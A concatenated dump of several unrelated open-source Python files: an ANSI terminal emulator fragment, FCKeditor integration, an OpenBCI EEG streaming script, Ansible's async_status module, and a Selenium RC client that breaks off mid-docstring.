('l', 'NUMBER_1', DoMode, 'INIT') ### It gets worse... the 'm' code can have infinite number of ### number;number;number before it. I've never seen more than two, ### but the specs say it's allowed. crap! self.state.add_transition ('m', 'NUMBER_1', None, 'INIT') ### LED control. Same implementation problem as 'm' code. self.state.add_transition ('q', 'NUMBER_1', None, 'INIT') # \E[?47h switch to alternate screen # \E[?47l restores to normal screen from alternate screen. self.state.add_transition_list (string.digits, 'MODECRAP', DoStartNumber, 'MODECRAP_NUM') self.state.add_transition_list (string.digits, 'MODECRAP_NUM', DoBuildNumber, 'MODECRAP_NUM') self.state.add_transition ('l', 'MODECRAP_NUM', None, 'INIT') self.state.add_transition ('h', 'MODECRAP_NUM', None, 'INIT') #RM Reset Mode Esc [ Ps l none self.state.add_transition (';', 'NUMBER_1', None, 'SEMICOLON') self.state.add_transition_any ('SEMICOLON', DoLog, 'INIT') self.state.add_transition_list (string.digits, 'SEMICOLON', DoStartNumber, 'NUMBER_2') self.state.add_transition_list (string.digits, 'NUMBER_2', DoBuildNumber, 'NUMBER_2') self.state.add_transition_any ('NUMBER_2', DoLog, 'INIT') self.state.add_transition ('H', 'NUMBER_2', DoHome, 'INIT') self.state.add_transition ('f', 'NUMBER_2', DoHome, 'INIT') self.state.add_transition ('r', 'NUMBER_2', DoScrollRegion, 'INIT') ### It gets worse... the 'm' code can have infinite number of ### number;number;number before it. I've never seen more than two, ### but the specs say it's allowed. crap! self.state.add_transition ('m', 'NUMBER_2', None, 'INIT') ### LED control. Same problem as 'm' code. self.state.add_transition ('q', 'NUMBER_2', None, 'INIT') self.state.add_transition (';', 'NUMBER_2', None, 'SEMICOLON_X') # Create a state for 'q' and 'm' which allows an infinite number of ignored numbers self.state.add_transition_any ('SEMICOLON_X', DoLog, 'INIT') self.state.add_transition_list (string.digits, 'SEMICOLON_X', None, 'NUMBER_X') self.state.add_transition_any ('NUMBER_X', DoLog, 'INIT') self.state.add_transition ('m', 'NUMBER_X', None, 'INIT') self.state.add_transition ('q', 'NUMBER_X', None, 'INIT') self.state.add_transition (';', 'NUMBER_2', None, 'SEMICOLON_X') def process (self, c): self.state.process(c) def process_list (self, l): self.write(l) def write (self, s): for c in s: self.process(c) def flush (self): pass def write_ch (self, ch): """This puts a character at the current cursor position. The cursor position is moved forward with wrap-around, but no scrolling is done if the cursor hits the lower-right corner of the screen. """ #\r and \n both produce a call to cr() and lf(), respectively. ch = ch[0] if ch == '\r': self.cr() return if ch == '\n': self.crlf() return if ch == chr(screen.BS): self.cursor_back() return if ch not in string.printable: fout = open ('log', 'a') fout.write ('Nonprint: ' + str(ord(ch)) + '\n') fout.close() return self.put_abs(self.cur_r, self.cur_c, ch) old_r = self.cur_r old_c = self.cur_c self.cursor_forward() if old_c == self.cur_c: self.cursor_down() if old_r != self.cur_r: self.cursor_home (self.cur_r, 1) else: self.scroll_up () self.cursor_home (self.cur_r, 1) self.erase_line() # def test (self): # # import sys # write_text = 'I\'ve got a ferret sticking up my nose.\n' + \ # '(He\'s got a ferret sticking up his nose.)\n' + \ # 'How it got there I can\'t tell\n' + \ # 'But now it\'s there it hurts like hell\n' + \ # 'And what is more it radically affects my sense of smell.\n' + \ # '(His sense of smell.)\n' + \ # 'I can see a bare-bottomed mandril.\n' + \ # '(Slyly eyeing his other nostril.)\n' + \ # 'If it jumps inside there too I really don\'t know what to do\n' + \ # 'I\'ll be the proud posessor of a kind of nasal zoo.\n' + \ # '(A nasal zoo.)\n' + \ # 'I\'ve got a ferret sticking up my nose.\n' + \ # '(And what is worst of all it constantly explodes.)\n' + \ # '"Ferrets don\'t explode," you say\n' + \ # 'But it happened nine times yesterday\n' + \ # 'And I should know for each time I was standing in the way.\n' + \ # 'I\'ve got a ferret sticking up my nose.\n' + \ # '(He\'s got a ferret sticking up his nose.)\n' + \ # 'How it got there I can\'t tell\n' + \ # 'But now it\'s there it hurts like hell\n' + \ # 'And what is more it radically affects my sense of smell.\n' + \ # '(His sense of smell.)' # self.fill('.') # self.cursor_home() # for c in write_text: # self.write_ch (c) # print str(self) # #if __name__ == '__main__': # t = ANSI(6,65) # t.test()
seanhennig/chor
refs/heads/master
wp-content/plugins/foliopress-wysiwyg/fckeditor/fckeditor.py
4
""" FCKeditor - The text editor for Internet - http://www.fckeditor.net Copyright (C) 2003-2010 Frederico Caldeira Knabben == BEGIN LICENSE == Licensed under the terms of any of the following licenses at your choice: - GNU General Public License Version 2 or later (the "GPL") http://www.gnu.org/licenses/gpl.html - GNU Lesser General Public License Version 2.1 or later (the "LGPL") http://www.gnu.org/licenses/lgpl.html - Mozilla Public License Version 1.1 or later (the "MPL") http://www.mozilla.org/MPL/MPL-1.1.html == END LICENSE == This is the integration file for Python. """ import cgi import os import re import string def escape(text, replace=string.replace): """Converts the special characters '<', '>', and '&'. RFC 1866 specifies that these characters be represented in HTML as &lt; &gt; and &amp; respectively. In Python 1.5 we use the new string.replace() function for speed. """ text = replace(text, '&', '&amp;') # must be done 1st text = replace(text, '<', '&lt;') text = replace(text, '>', '&gt;') text = replace(text, '"', '&quot;') text = replace(text, "'", '&#39;') return text # The FCKeditor class class FCKeditor(object): def __init__(self, instanceName): self.InstanceName = instanceName self.BasePath = '/fckeditor/' self.Width = '100%' self.Height = '200' self.ToolbarSet = 'Default' self.Value = ''; self.Config = {} def Create(self): return self.CreateHtml() def CreateHtml(self): HtmlValue = escape(self.Value) Html = "" if (self.IsCompatible()): File = "fckeditor.html" Link = "%seditor/%s?InstanceName=%s" % ( self.BasePath, File, self.InstanceName ) if (self.ToolbarSet is not None): Link += "&amp;Toolbar=%s" % self.ToolbarSet # Render the linked hidden field Html += "<input type=\"hidden\" id=\"%s\" name=\"%s\" value=\"%s\" style=\"display:none\" />" % ( self.InstanceName, self.InstanceName, HtmlValue ) # Render the configurations hidden field Html += "<input type=\"hidden\" id=\"%s___Config\" value=\"%s\" style=\"display:none\" />" % ( self.InstanceName, self.GetConfigFieldString() ) # Render the editor iframe Html += "<iframe id=\"%s\__Frame\" src=\"%s\" width=\"%s\" height=\"%s\" frameborder=\"0\" scrolling=\"no\"></iframe>" % ( self.InstanceName, Link, self.Width, self.Height ) else: if (self.Width.find("%%") < 0): WidthCSS = "%spx" % self.Width else: WidthCSS = self.Width if (self.Height.find("%%") < 0): HeightCSS = "%spx" % self.Height else: HeightCSS = self.Height Html += "<textarea name=\"%s\" rows=\"4\" cols=\"40\" style=\"width: %s; height: %s;\" wrap=\"virtual\">%s</textarea>" % ( self.InstanceName, WidthCSS, HeightCSS, HtmlValue ) return Html def IsCompatible(self): if (os.environ.has_key("HTTP_USER_AGENT")): sAgent = os.environ.get("HTTP_USER_AGENT", "") else: sAgent = "" if (sAgent.find("MSIE") >= 0) and (sAgent.find("mac") < 0) and (sAgent.find("Opera") < 0): i = sAgent.find("MSIE") iVersion = float(sAgent[i+5:i+5+3]) if (iVersion >= 5.5): return True return False elif (sAgent.find("Gecko/") >= 0): if (re.search(r'Gecko\/\d+\.\d+', sAgent)): return True i = sAgent.find("Gecko/") iVersion = int(sAgent[i+6:i+6+8]) if (iVersion >= 20030210): return True return False elif (sAgent.find("Opera/") >= 0): i = sAgent.find("Opera/") iVersion = float(sAgent[i+6:i+6+4]) if (iVersion >= 9.5): return True return False elif (sAgent.find("AppleWebKit/") >= 0): p = re.compile('AppleWebKit\/(\d+)', re.IGNORECASE) m = p.search(sAgent) if (m.group(1) >= 522): return True return False else: return False def GetConfigFieldString(self): sParams = "" bFirst = True for sKey in self.Config.keys(): sValue = self.Config[sKey] if (not bFirst): sParams += "&amp;" else: bFirst = False if (sValue): k = escape(sKey) v = escape(sValue) if (sValue == "true"): sParams += "%s=true" % k elif (sValue == "false"): sParams += "%s=false" % k else: sParams += "%s=%s" % (k, v) return sParams
olist/correios
refs/heads/master
tests/__init__.py
15
# Copyright 2016 Osvaldo Santana Neto # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.
neurotechuoft/MindType
refs/heads/master
Code/V1/src/deprecated/scripts/stream_data.py
1
import sys; sys.path.append('..') # help python find open_bci_v3.py relative to scripts folder import open_bci_v3 as bci import streamer_tcp_server import time, timeit from threading import Thread # Transmit data to openvibe acquisition server, intelpolating data (well, sort of) from 250Hz to 256Hz # Listen to new connections every second using a separate thread. # NB: Left here for resampling algorithm, prefer the use of main.py. NB_CHANNELS = 8 # If > 0 will interpolate based on samples count, typically 1.024 to go from 250Hz to 256Hz SAMPLING_FACTOR = -1.024 # If > 0 will interbolate based on elapsed time SAMPLING_RATE = 256 SERVER_PORT=12345 SERVER_IP="localhost" DEBUG=False # check packet drop last_id = -1 # counter for sampling rate nb_samples_in = -1 nb_samples_out = -1 # last seen values for interpolation last_values = [0] * NB_CHANNELS # counter to trigger duplications... leftover_duplications = 0 tick=timeit.default_timer() # try to ease work for main loop class Monitor(Thread): def __init__(self): Thread.__init__(self) self.nb_samples_in = -1 self.nb_samples_out = -1 # Init time to compute sampling rate self.tick = timeit.default_timer() self.start_tick = self.tick def run(self): while True: # check FPS + listen for new connections new_tick = timeit.default_timer() elapsed_time = new_tick - self.tick current_samples_in = nb_samples_in current_samples_out = nb_samples_out print "--- at t: ", (new_tick - self.start_tick), " ---" print "elapsed_time: ", elapsed_time print "nb_samples_in: ", current_samples_in - self.nb_samples_in print "nb_samples_out: ", current_samples_out - self.nb_samples_out self.tick = new_tick self.nb_samples_in = nb_samples_in self.nb_samples_out = nb_samples_out # time to watch for connection # FIXME: not so great with threads server.check_connections() time.sleep(1) def streamData(sample): global last_values global tick # check packet skipped global last_id # TODO: duplicate packet if skipped to stay sync if sample.id != last_id + 1: print "time", tick, ": paquet skipped!" if sample.id == 255: last_id = -1 else: last_id = sample.id # update counters global nb_samples_in, nb_samples_out nb_samples_in = nb_samples_in + 1 # check for duplication, by default 1 (...which is *no* duplication of the one current sample) global leftover_duplications # first method with sampling rate and elapsed time (depends on system clock accuracy) if (SAMPLING_RATE > 0): # elapsed time since last call, update tick now = timeit.default_timer() elapsed_time = now - tick; # now we have to compute how many times we should send data to keep up with sample rate (oversampling) leftover_duplications = SAMPLING_RATE * elapsed_time + leftover_duplications - 1 tick = now # second method with a samplin factor (depends on openbci accuracy) elif SAMPLING_FACTOR > 0: leftover_duplications = SAMPLING_FACTOR + leftover_duplications - 1 #print "needed_duplications: ", needed_duplications, "leftover_duplications: ", leftover_duplications # If we need to insert values, will interpolate between current packet and last one # FIXME: ok, at the moment because we do packet per packet treatment, only handles nb_duplications == 1 for more interpolation is bad and sends nothing if (leftover_duplications > 1): leftover_duplications = leftover_duplications - 1 interpol_values = list(last_values) for i in range(0,len(interpol_values)): # OK, it's a very rough interpolation interpol_values[i] = (last_values[i] + sample.channel_data[i]) / 2 if DEBUG: print " --" print " last values: ", last_values print " interpolation: ", interpol_values print " current sample: ", sample.channel_data # send to clients interpolated sample #leftover_duplications = 0 server.broadcast_values(interpol_values) nb_samples_out = nb_samples_out + 1 # send to clients current sample server.broadcast_values(sample.channel_data) nb_samples_out = nb_samples_out + 1 # save current values for possible interpolation last_values = list(sample.channel_data) if __name__ == '__main__': # init server server = streamer_tcp_server.StreamerTCPServer(ip=SERVER_IP, port=SERVER_PORT, nb_channels=NB_CHANNELS) # init board port = '/dev/ttyUSB1' baud = 115200 monit = Monitor() # daemonize theard to terminate it altogether with the main when time will come monit.daemon = True monit.start() board = bci.OpenBCIBoard(port=port, baud=baud, filter_data=False) board.startStreaming(streamData)
sgerhart/ansible
refs/heads/maintenance_policy_module
lib/ansible/modules/utilities/logic/async_status.py
19
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>, and others # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['stableinterface'], 'supported_by': 'core'} DOCUMENTATION = ''' --- module: async_status short_description: Obtain status of asynchronous task description: - This module gets the status of an asynchronous task. - This module is also supported for Windows targets. version_added: "0.5" options: jid: description: - Job or task identifier required: true mode: description: - if C(status), obtain the status; if C(cleanup), clean up the async job cache (by default in C(~/.ansible_async/)) for the specified job I(jid). choices: [ "status", "cleanup" ] default: "status" notes: - See also U(https://docs.ansible.com/playbooks_async.html) - This module is also supported for Windows targets. author: - "Ansible Core Team" - "Michael DeHaan" ''' import json import os from ansible.module_utils._text import to_native from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.six import iteritems def main(): module = AnsibleModule(argument_spec=dict( jid=dict(required=True), mode=dict(default='status', choices=['status', 'cleanup']), # passed in from the async_status action plugin _async_dir=dict(required=True, type='path'), )) mode = module.params['mode'] jid = module.params['jid'] async_dir = module.params['_async_dir'] # setup logging directory logdir = os.path.expanduser(async_dir) log_path = os.path.join(logdir, jid) if not os.path.exists(log_path): module.fail_json(msg="could not find job", ansible_job_id=jid, started=1, finished=1) if mode == 'cleanup': os.unlink(log_path) module.exit_json(ansible_job_id=jid, erased=log_path) # NOT in cleanup mode, assume regular status mode # no remote kill mode currently exists, but probably should # consider log_path + ".pid" file and also unlink that above data = None try: data = open(log_path).read() data = json.loads(data) except Exception: if not data: # file not written yet? That means it is running module.exit_json(results_file=log_path, ansible_job_id=jid, started=1, finished=0) else: module.fail_json(ansible_job_id=jid, results_file=log_path, msg="Could not parse job output: %s" % data, started=1, finished=1) if 'started' not in data: data['finished'] = 1 data['ansible_job_id'] = jid elif 'finished' not in data: data['finished'] = 0 # Fix error: TypeError: exit_json() keywords must be strings data = dict([(to_native(k), v) for k, v in iteritems(data)]) module.exit_json(**data) if __name__ == '__main__': main()
wilxsv/sinam
refs/heads/master
symfony/web/assets/js/OpenLayers-2.13.1/tests/selenium/remotecontrol/selenium.py
254
""" Copyright 2006 ThoughtWorks, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ __docformat__ = "restructuredtext en" # This file has been automatically generated via XSL import httplib import urllib import re class selenium: """ Defines an object that runs Selenium commands. Element Locators ~~~~~~~~~~~~~~~~ Element Locators tell Selenium which HTML element a command refers to. The format of a locator is: \ *locatorType*\ **=**\ \ *argument* We support the following strategies for locating elements: * \ **identifier**\ =\ *id*: Select the element with the specified @id attribute. If no match is found, select the first element whose @name attribute is \ *id*. (This is normally the default; see below.) * \ **id**\ =\ *id*: Select the element with the specified @id attribute. * \ **name**\ =\ *name*: Select the first element with the specified @name attribute. * username * name=username The name may optionally be followed by one or more \ *element-filters*, separated from the name by whitespace. If the \ *filterType* is not specified, \ **value**\ is assumed. * name=flavour value=chocolate * \ **dom**\ =\ *javascriptExpression*: Find an element by evaluating the specified string. This allows you to traverse the HTML Document Object Model using JavaScript. Note that you must not return a value in this string; simply make it the last expression in the block. * dom=document.forms['myForm'].myDropdown * dom=document.images[56] * dom=function foo() { return document.links[1]; }; foo(); * \ **xpath**\ =\ *xpathExpression*: Locate an element using an XPath expression. * xpath=//img[@alt='The image alt text'] * xpath=//table[@id='table1']//tr[4]/td[2] * xpath=//a[contains(@href,'#id1')] * xpath=//a[contains(@href,'#id1')]/@class * xpath=(//table[@class='stylee'])//th[text()='theHeaderText']/../td * xpath=//input[@name='name2' and @value='yes'] * xpath=//\*[text()="right"] * \ **link**\ =\ *textPattern*: Select the link (anchor) element which contains text matching the specified \ *pattern*. * link=The link text * \ **css**\ =\ *cssSelectorSyntax*: Select the element using css selectors. Please refer to CSS2 selectors, CSS3 selectors for more information. You can also check the TestCssLocators test in the selenium test suite for an example of usage, which is included in the downloaded selenium core package. * css=a[href="#id3"] * css=span#firstChild + span Currently the css selector locator supports all css1, css2 and css3 selectors except namespace in css3, some pseudo classes(:nth-of-type, :nth-last-of-type, :first-of-type, :last-of-type, :only-of-type, :visited, :hover, :active, :focus, :indeterminate) and pseudo elements(::first-line, ::first-letter, ::selection, ::before, ::after). Without an explicit locator prefix, Selenium uses the following default strategies: * \ **dom**\ , for locators starting with "document." * \ **xpath**\ , for locators starting with "//" * \ **identifier**\ , otherwise Element Filters ~~~~~~~~~~~~~~~ Element filters can be used with a locator to refine a list of candidate elements. They are currently used only in the 'name' element-locator. Filters look much like locators, ie. \ *filterType*\ **=**\ \ *argument* Supported element-filters are: \ **value=**\ \ *valuePattern* Matches elements based on their values. This is particularly useful for refining a list of similarly-named toggle-buttons. \ **index=**\ \ *index* Selects a single element based on its position in the list (offset from zero). String-match Patterns ~~~~~~~~~~~~~~~~~~~~~ Various Pattern syntaxes are available for matching string values: * \ **glob:**\ \ *pattern*: Match a string against a "glob" (aka "wildmat") pattern. "Glob" is a kind of limited regular-expression syntax typically used in command-line shells. In a glob pattern, "\*" represents any sequence of characters, and "?" represents any single character. Glob patterns match against the entire string. * \ **regexp:**\ \ *regexp*: Match a string using a regular-expression. The full power of JavaScript regular-expressions is available. * \ **regexpi:**\ \ *regexpi*: Match a string using a case-insensitive regular-expression. * \ **exact:**\ \ *string*: Match a string exactly, verbatim, without any of that fancy wildcard stuff. If no pattern prefix is specified, Selenium assumes that it's a "glob" pattern. For commands that return multiple values (such as verifySelectOptions), the string being matched is a comma-separated list of the return values, where both commas and backslashes in the values are backslash-escaped. When providing a pattern, the optional matching syntax (i.e. glob, regexp, etc.) is specified once, as usual, at the beginning of the pattern. """ ### This part is hard-coded in the XSL def __init__(self, host, port, browserStartCommand, browserURL): self.host = host self.port = port self.browserStartCommand = browserStartCommand self.browserURL = browserURL self.sessionId = None def start(self): result = self.get_string("getNewBrowserSession", [self.browserStartCommand, self.browserURL]) try: self.sessionId = result except ValueError: raise Exception, result def stop(self): self.do_command("testComplete", []) self.sessionId = None def do_command(self, verb, args): conn = httplib.HTTPConnection(self.host, self.port) commandString = u'/selenium-server/driver/?cmd=' + urllib.quote_plus(unicode(verb).encode('utf-8')) for i in range(len(args)): commandString = commandString + '&' + unicode(i+1) + '=' + urllib.quote_plus(unicode(args[i]).encode('utf-8')) if (None != self.sessionId): commandString = commandString + "&sessionId=" + unicode(self.sessionId) conn.request("GET", commandString) response = conn.getresponse() #print response.status, response.reason data = unicode(response.read(), "UTF-8") result = response.reason #print "Selenium Result: " + repr(data) + "\n\n" if (not data.startswith('OK')): raise Exception, data return data def get_string(self, verb, args): result = self.do_command(verb, args) return result[3:] def get_string_array(self, verb, args): csv = self.get_string(verb, args) token = "" tokens = [] escape = False for i in range(len(csv)): letter = csv[i] if (escape): token = token + letter escape = False continue if (letter == '\\'): escape = True elif (letter == ','): tokens.append(token) token = "" else: token = token + letter tokens.append(token) return tokens def get_number(self, verb, args): # Is there something I need to do here? return self.get_string(verb, args) def get_number_array(self, verb, args): # Is there something I need to do here? return self.get_string_array(verb, args) def get_boolean(self, verb, args): boolstr = self.get_string(verb, args) if ("true" == boolstr): return True if ("false" == boolstr): return False raise ValueError, "result is neither 'true' nor 'false': " + boolstr def get_boolean_array(self, verb, args): boolarr = self.get_string_array(verb, args) for i in range(len(boolarr)): if ("true" == boolstr): boolarr[i] = True continue if ("false" == boolstr): boolarr[i] = False continue raise ValueError, "result is neither 'true' nor 'false': " + boolarr[i] return boolarr ### From here on, everything's auto-generated from XML def click(self,locator): """ Clicks on a link, button, checkbox or radio button. If the click action causes a new page to load (like a link usually does), call waitForPageToLoad. 'locator' is an element locator """ self.do_command("click", [locator,]) def double_click(self,locator): """ Double clicks on a link, button, checkbox or radio button. If the double click action causes a new page to load (like a link usually does), call waitForPageToLoad. 'locator' is an element locator """ self.do_command("doubleClick", [locator,]) def context_menu(self,locator): """ Simulates opening the context menu for the specified element (as might happen if the user "right-clicked" on the element). 'locator' is an element locator """ self.do_command("contextMenu", [locator,]) def click_at(self,locator,coordString): """ Clicks on a link, button, checkbox or radio button. If the click action causes a new page to load (like a link usually does), call waitForPageToLoad. 'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("clickAt", [locator,coordString,]) def double_click_at(self,locator,coordString): """ Doubleclicks on a link, button, checkbox or radio button. If the action causes a new page to load (like a link usually does), call waitForPageToLoad. 'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("doubleClickAt", [locator,coordString,]) def context_menu_at(self,locator,coordString): """ Simulates opening the context menu for the specified element (as might happen if the user "right-clicked" on the element). 'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("contextMenuAt", [locator,coordString,]) def fire_event(self,locator,eventName): """ Explicitly simulate an event, to trigger the corresponding "on\ *event*" handler. 'locator' is an element locator 'eventName' is the event name, e.g. "focus" or "blur" """ self.do_command("fireEvent", [locator,eventName,]) def focus(self,locator): """ Move the focus to the specified element; for example, if the element is an input field, move the cursor to that field. 'locator' is an element locator """ self.do_command("focus", [locator,]) def key_press(self,locator,keySequence): """ Simulates a user pressing and releasing a key. 'locator' is an element locator 'keySequence' is Either be a string("\" followed by the numeric keycode of the key to be pressed, normally the ASCII value of that key), or a single character. For example: "w", "\119". """ self.do_command("keyPress", [locator,keySequence,]) def shift_key_down(self): """ Press the shift key and hold it down until doShiftUp() is called or a new page is loaded. """ self.do_command("shiftKeyDown", []) def shift_key_up(self): """ Release the shift key. """ self.do_command("shiftKeyUp", []) def meta_key_down(self): """ Press the meta key and hold it down until doMetaUp() is called or a new page is loaded. """ self.do_command("metaKeyDown", []) def meta_key_up(self): """ Release the meta key. """ self.do_command("metaKeyUp", []) def alt_key_down(self): """ Press the alt key and hold it down until doAltUp() is called or a new page is loaded. """ self.do_command("altKeyDown", []) def alt_key_up(self): """ Release the alt key. """ self.do_command("altKeyUp", []) def control_key_down(self): """ Press the control key and hold it down until doControlUp() is called or a new page is loaded. """ self.do_command("controlKeyDown", []) def control_key_up(self): """ Release the control key. """ self.do_command("controlKeyUp", []) def key_down(self,locator,keySequence): """ Simulates a user pressing a key (without releasing it yet). 'locator' is an element locator 'keySequence' is Either be a string("\" followed by the numeric keycode of the key to be pressed, normally the ASCII value of that key), or a single character. For example: "w", "\119". """ self.do_command("keyDown", [locator,keySequence,]) def key_up(self,locator,keySequence): """ Simulates a user releasing a key. 'locator' is an element locator 'keySequence' is Either be a string("\" followed by the numeric keycode of the key to be pressed, normally the ASCII value of that key), or a single character. For example: "w", "\119". """ self.do_command("keyUp", [locator,keySequence,]) def mouse_over(self,locator): """ Simulates a user hovering a mouse over the specified element. 'locator' is an element locator """ self.do_command("mouseOver", [locator,]) def mouse_out(self,locator): """ Simulates a user moving the mouse pointer away from the specified element. 'locator' is an element locator """ self.do_command("mouseOut", [locator,]) def mouse_down(self,locator): """ Simulates a user pressing the mouse button (without releasing it yet) on the specified element. 'locator' is an element locator """ self.do_command("mouseDown", [locator,]) def mouse_down_at(self,locator,coordString): """ Simulates a user pressing the mouse button (without releasing it yet) at the specified location. 'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("mouseDownAt", [locator,coordString,]) def mouse_up(self,locator): """ Simulates the event that occurs when the user releases the mouse button (i.e., stops holding the button down) on the specified element. 'locator' is an element locator """ self.do_command("mouseUp", [locator,]) def mouse_up_at(self,locator,coordString): """ Simulates the event that occurs when the user releases the mouse button (i.e., stops holding the button down) at the specified location. 'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("mouseUpAt", [locator,coordString,]) def mouse_move(self,locator): """ Simulates a user pressing the mouse button (without releasing it yet) on the specified element. 'locator' is an element locator """ self.do_command("mouseMove", [locator,]) def mouse_move_at(self,locator,coordString): """ Simulates a user pressing the mouse button (without releasing it yet) on the specified element. 'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("mouseMoveAt", [locator,coordString,]) def type(self,locator,value): """ Sets the value of an input field, as though you typed it in. Can also be used to set the value of combo boxes, check boxes, etc. In these cases, value should be the value of the option selected, not the visible text. 'locator' is an element locator 'value' is the value to type """ self.do_command("type", [locator,value,]) def type_keys(self,locator,value): """ Simulates keystroke events on the specified element, as though you typed the value key-by-key. This is a convenience method for calling keyDown, keyUp, keyPress for every character in the specified string; this is useful for dynamic UI widgets (like auto-completing combo boxes) that require explicit key events. Unlike the simple "type" command, which forces the specified value into the page directly, this command may or may not have any visible effect, even in cases where typing keys would normally have a visible effect. For example, if you use "typeKeys" on a form element, you may or may not see the results of what you typed in the field. In some cases, you may need to use the simple "type" command to set the value of the field and then the "typeKeys" command to send the keystroke events corresponding to what you just typed. 'locator' is an element locator 'value' is the value to type """ self.do_command("typeKeys", [locator,value,]) def set_speed(self,value): """ Set execution speed (i.e., set the millisecond length of a delay which will follow each selenium operation). By default, there is no such delay, i.e., the delay is 0 milliseconds. 'value' is the number of milliseconds to pause after operation """ self.do_command("setSpeed", [value,]) def get_speed(self): """ Get execution speed (i.e., get the millisecond length of the delay following each selenium operation). By default, there is no such delay, i.e., the delay is 0 milliseconds. See also setSpeed. """ return self.get_string("getSpeed", []) def check(self,locator): """ Check a toggle-button (checkbox/radio) 'locator' is an element locator """ self.do_command("check", [locator,]) def uncheck(self,locator): """ Uncheck a toggle-button (checkbox/radio) 'locator' is an element locator """ self.do_command("uncheck", [locator,]) def select(self,selectLocator,optionLocator): """ Select an option from a drop-down using an option locator. Option locators provide different ways of specifying options of an HTML Select element (e.g. for selecting a specific option, or for asserting that the selected option satisfies a specification). There are several forms of Select Option Locator. * \ **label**\ =\ *labelPattern*: matches options based on their labels, i.e. the visible text. (This is the default.) * label=regexp:^[Oo]ther * \ **value**\ =\ *valuePattern*: matches options based on their values. * value=other * \ **id**\ =\ *id*: matches options based on their ids. * id=option1 * \ **index**\ =\ *index*: matches an option based on its index (offset from zero). * index=2 If no option locator prefix is provided, the default behaviour is to match on \ **label**\ . 'selectLocator' is an element locator identifying a drop-down menu 'optionLocator' is an option locator (a label by default) """ self.do_command("select", [selectLocator,optionLocator,]) def add_selection(self,locator,optionLocator): """ Add a selection to the set of selected options in a multi-select element using an option locator. @see #doSelect for details of option locators 'locator' is an element locator identifying a multi-select box 'optionLocator' is an option locator (a label by default) """ self.do_command("addSelection", [locator,optionLocator,]) def remove_selection(self,locator,optionLocator): """ Remove a selection from the set of selected options in a multi-select element using an option locator. @see #doSelect for details of option locators 'locator' is an element locator identifying a multi-select box 'optionLocator' is an option locator (a label by default) """ self.do_command("removeSelection", [locator,optionLocator,]) def remove_all_selections(self,locator): """ Unselects all of the selected options in a multi-select element. 'locator' is an element locator identifying a multi-select box """ self.do_command("removeAllSelections", [locator,]) def submit(self,formLocator): """ Submit the specified form. This is particularly useful for forms without submit buttons, e.g. single-input "Search" forms. 'formLocator' is an element locator for the form you want to submit """ self.do_command("submit", [formLocator,]) def open(self,url): """ Opens an URL in the test frame. This accepts both relative and absolute URLs. The "open" command waits for the page to load before proceeding, ie. the "AndWait" suffix is implicit. \ *Note*: The URL must be on the same domain as the runner HTML due to security restrictions in the browser (Same Origin Policy). If you need to open an URL on another domain, use the Selenium Server to start a new browser session on that domain. 'url' is the URL to open; may be relative or absolute """ self.do_command("open", [url,]) def open_window(self,url,windowID): """ Opens a popup window (if a window with that ID isn't already open). After opening the window, you'll need to select it using the selectWindow command. This command can also be a useful workaround for bug SEL-339. In some cases, Selenium will be unable to intercept a call to window.open (if the call occurs during or before the "onLoad" event, for example). In those cases, you can force Selenium to notice the open window's name by using the Selenium openWindow command, using an empty (blank) url, like this: openWindow("", "myFunnyWindow"). 'url' is the URL to open, which can be blank 'windowID' is the JavaScript window ID of the window to select """ self.do_command("openWindow", [url,windowID,]) def select_window(self,windowID): """ Selects a popup window using a window locator; once a popup window has been selected, all commands go to that window. To select the main window again, use null as the target. Window locators provide different ways of specifying the window object: by title, by internal JavaScript "name," or by JavaScript variable. * \ **title**\ =\ *My Special Window*: Finds the window using the text that appears in the title bar. Be careful; two windows can share the same title. If that happens, this locator will just pick one. * \ **name**\ =\ *myWindow*: Finds the window using its internal JavaScript "name" property. This is the second parameter "windowName" passed to the JavaScript method window.open(url, windowName, windowFeatures, replaceFlag) (which Selenium intercepts). * \ **var**\ =\ *variableName*: Some pop-up windows are unnamed (anonymous), but are associated with a JavaScript variable name in the current application window, e.g. "window.foo = window.open(url);". In those cases, you can open the window using "var=foo". If no window locator prefix is provided, we'll try to guess what you mean like this: 1.) if windowID is null, (or the string "null") then it is assumed the user is referring to the original window instantiated by the browser). 2.) if the value of the "windowID" parameter is a JavaScript variable name in the current application window, then it is assumed that this variable contains the return value from a call to the JavaScript window.open() method. 3.) Otherwise, selenium looks in a hash it maintains that maps string names to window "names". 4.) If \ *that* fails, we'll try looping over all of the known windows to try to find the appropriate "title". Since "title" is not necessarily unique, this may have unexpected behavior. If you're having trouble figuring out the name of a window that you want to manipulate, look at the Selenium log messages which identify the names of windows created via window.open (and therefore intercepted by Selenium). You will see messages like the following for each window as it is opened: ``debug: window.open call intercepted; window ID (which you can use with selectWindow()) is "myNewWindow"`` In some cases, Selenium will be unable to intercept a call to window.open (if the call occurs during or before the "onLoad" event, for example). (This is bug SEL-339.) In those cases, you can force Selenium to 